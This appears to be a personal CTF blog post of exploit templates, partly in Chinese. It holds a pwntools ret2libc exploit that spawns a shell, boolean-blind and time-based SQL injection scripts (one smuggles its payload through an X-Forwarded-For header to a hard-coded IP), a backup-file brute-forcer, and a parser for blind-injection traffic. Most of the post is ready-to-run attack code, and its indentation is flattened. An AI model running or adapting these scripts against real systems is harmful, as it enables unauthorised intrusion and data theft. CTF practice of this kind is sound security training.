EXP for ctf

Posted by Elli0t on 3007-01-09

First you hate ‘em, then you get used to ‘em. Enough time passes, gets so you depend on them. That’s institutionalized.

1
2
3
4
5
6
7
8
9
10
docker run -d \
--rm \
-h ${ctf_name} \
--name ${ctf_name} \
-v $(pwd)/${ctf_name}:/ctf/work \
-p 23946:23946 \
--cap-add=SYS_PTRACE \
skysider/pwndocker

docker exec -it ${ctf_name} /bin/bash

记录一些 exp 常用模版

PWN

ret2libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
from pwn import *
import time

context.terminal=["tmux","sp","-h"]
context.log_level='debug'

DEBUG = 0
LOCAL = True
BIN = './level3_x64'
HOST = 'node3.buuoj.cn'
PORT = 27939

def exploit(sh):
libc = ELF('./libc-2.19.so')
sys_lib_addr = libc.symbols['system']
write_lib_addr = libc.symbols['write']
bin_lib_addr = libc.search('/bin/sh').next()
#eli0t
write_plt = elf.symbols['write']
write_got = elf.got['write']
vulner_addr = elf.symbols['vulnerable_function']
rdi = 0x4006b3
rsi = 0x4006b1
payload = 0x80*'a' + 0x8*'b' + p64(rdi) + p64(0x1) + p64(rsi) + p64(write_got) + p64(0x1) + p64(write_plt) + p64(vulner_addr)
# []high
# []vulner_addr
# []write_plt
# []0x1
# []write_got
# []rsi
# []0x1
# []rdi
# []…140
# []low
sh.recvuntil('Input:\n')
sh.sendline(payload)
write_true = u64(sh.recv(8))
sys_true = write_true - write_lib_addr + sys_lib_addr
bin_true = write_true - write_lib_addr + bin_lib_addr # here
payload_2 = 0x80*'a' + 0x8*'b' + p64(rdi) + p64(bin_true) + p64(sys_true) + p64(0x1)
sh.recvuntil('Input:\n')
sh.sendline(payload_2)
sh.interactive()
return

if __name__ == '__main__':
elf = ELF(BIN)
if len(sys.argv) > 1:
LOCAL = False
sh = remote(HOST,PORT)
exploit(sh)
else:
LOCAL = True
sh = process(BIN)
log.info('PID: ' + str(proc.pidof(sh)[0]))
# pause
if DEBUG:
gdb.attach(sh)
exploit(sh)

Web

布尔盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import requests


url = "?id="
result = ""
for i in range(20,50):
low = 32
high =128
mid = (high+low)//2
while(low<high):
payload ="0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
html = requests.get(url+payload)
print(low,high,mid,":")
print(url+payload)
if "YES" in html.text:
low = mid+1
else:
high = mid
mid = (high+low)//2
if(low ==32 or high==128):
break
result = result + chr(mid)
print(result)
print("flag: " ,result)

时间注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import string
import requests
str_con=string.ascii_letters+string.digits

url='http://123.206.87.240:8002/web15/'
sql_into="127.0.0.1'+(select case when (substr((select flag from flag)from {0} for 1))='{1}' then sleep(5) else 1 end) and '1'='1"
#sql_into="127.0.0.1'+(select case when (substr((select flag from flag)from {0} for 1))='{1}' then sleep(5) else 1 end) %23 "
#substr(‘abc’ from 1 for 1)等于substr('abc' from 1 for 1)
#select case when 表达式 then 表达式 else 表达式 end 等价于IF(表达式,TRUE,False)
flag=''
for i in range(1,35):
for j in str_con:
try:
headers={
'X-Forwarded-For':sql_into.format(str(i),j)
}
re=requests.get(url,headers=headers,timeout=3)
except requests.exceptions.ReadTimeout:
flag += j
print (flag)
break
print('the final flag is '+flag)

爆破

1
2
3
4
5
6
7
8
9
10
11
12
import requests
qwe=open("1.txt","w")
name=['web','website','backup','back','www','wwwroot','temp']
suffix=['tar','tar.gz','zip','rar']
for i in name:
for j in suffix:
url="http://challenge-049c6ebba1992bc1.sandbox.ctfhub.com:10080/%s.%s" % (i,j)
web=requests.get(url)
qwe.write(web.text)
if web.status_code==200:
print("warn!The flag is in %s" % url)
print(requests.get(url).text)

正则匹配

1
2
3
4
5
6
7
8
9
10
import re
source='dskfjnvsijefhg1231342341234+123124234-12423524352345*43563743652637+134256453764534-1345643q2sdafewrq34egfrq3wef;fl[splv]'
expression = re.search(r"([\d+[+\-\*])+\d+", source).group()
#正则匹配想要的表达式
print(expression)
print(eval(expression))
'''
result = eval(expression)#计算正则匹配的内容
print(result,type(result))
'''

Misc

流量审计(盲注流量)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# -*- coding: utf-8 -*-
import re


flag = ''
for i in range(1,40):
f = open('test4.txt','r')
line = f.readline()
tmp = 0
while line:
data = re.search(str(i)+',1\)\)>(.+?)(.+?)(.+?)', line)
if data:
print data.group()
try:
str1 = int(data.group()[-3:])
print str1
if str1 >= tmp:
tmp = str1 + 1
except:
pass
line = f.readline()
else:
line = f.readline()
flag = flag + chr(tmp)

f.close()
print (flag)

'''
SELECT * from news where id =1 AND
ORD(
MID(
(SELECT IFNULL(
CAST(flag_here AS CHAR),0x20
) FROM sqltest.flag ORDER BY flag_here LIMIT 0,1)
,1,1)
)
>112
'''

# https://blog.csdn.net/qq_40519543/article/details/107135902

base64 to str

1
2
3
4
5
6
7
8
9
10
11
import base64
base = open("base.txt", "r")
resu = open("resu.txt", "a")
line = base.readline()
while line:
resu_line = base64.b64decode(line)
resu_line = resu_line.decode()
resu.write(resu_line)
line = base.readline()
base.close()
resu.close()